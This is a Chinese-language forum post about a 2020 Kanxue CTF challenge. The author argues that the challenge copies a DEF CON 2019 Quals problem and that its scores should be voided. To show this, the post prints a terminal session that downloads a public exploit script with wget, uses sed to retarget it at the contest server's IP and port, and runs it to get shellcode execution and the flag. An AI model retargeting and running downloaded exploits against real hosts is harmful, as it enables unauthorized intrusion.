[建议] 看雪.安恒2020 KCTF春季赛 第五题 闻鸡起舞
发表于:
2020-4-24 10:50
5179
[建议] 看雪.安恒2020 KCTF春季赛 第五题 闻鸡起舞
建议同时取消本题攻击方、防守方的分数 分析下载程序之后,参与过 2019 年的 DEF CON CTF Qualifier 的人就会感觉到一股熟悉,没错,这个程序正是原封原样照抄的,只改了提示的字符串,甚至连 write 的时候的长度都没改,导致输出的提示长的不太正常(多了个 "\x00S")。
在放出的第一天没有人提交 flag,是因为部署到了 Ubuntu 16.04 上,而 16.04 的 libc 恰好破坏了程序中埋的 secret 未擦除的 bug。当然,通过这里 描述的解法也还是能解的,不过要针对远程环境调一下 cacheline grooming 的样子,还要跑一个 16-bit 的暴力,估计吓退了一些人吧。
解决直接拿以前的 exploit 运行即可。或者直接下载运行别人写好的 exploit:
$ wget 'https://github.com/david942j/ctf-writeups/raw/master/defcon-quals-2019/hotel-california/hotel.py'
--2020-04-24 10:31:22-- https://github.com/david942j/ctf-writeups/raw/master/defcon-quals-2019/hotel-california/hotel.py
Resolving github.com (github.com)... 15.164.81.167
Connecting to github.com (github.com)|15.164.81.167|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/david942j/ctf-writeups/master/defcon-quals-2019/hotel-california/hotel.py [following]
--2020-04-24 10:31:22-- https://raw.githubusercontent.com/david942j/ctf-writeups/master/defcon-quals-2019/hotel-california/hotel.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.0.133, 151.101.64.133, 151.101.128.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.0.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1244 (1.2K) [text/plain]
Saving to: ‘hotel.py’
hotel.py 100%[=====================================================================================================================================>] 1.21K --.-KB/s in 0s
2020-04-24 10:31:23 (19.6 MB/s) - ‘hotel.py’ saved [1244/1244]
$ sed -i s/hotelcalifornia.quals2019.oooverflow.io/47.102.223.17/g hotel.py
$ sed -i s/7777/10000/g hotel.py
$ sed -i s/FLAG.txt/flag/g hotel.py
$ python hotel.py mdzz
<...略...>
[*] Switching to interactive mode
Welcome to the 2020kanxueCTF.
\x00
S
Shellcode > \x00
(get 1024 bytes)
We are We failed!
Shellcode > \x00
(get 0 bytes)
flag{a01e62c0-17f8-4ec9-8be6-37e0a768f5d8}
[*] Closed connection to 47.102.223.17 port 10000
[*] Got EOF while reading in interactive
如果这样的题目分数都保留,这比赛还有什么意义?
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
最后于 2020-4-24 19:15
被kanxue编辑
,原因: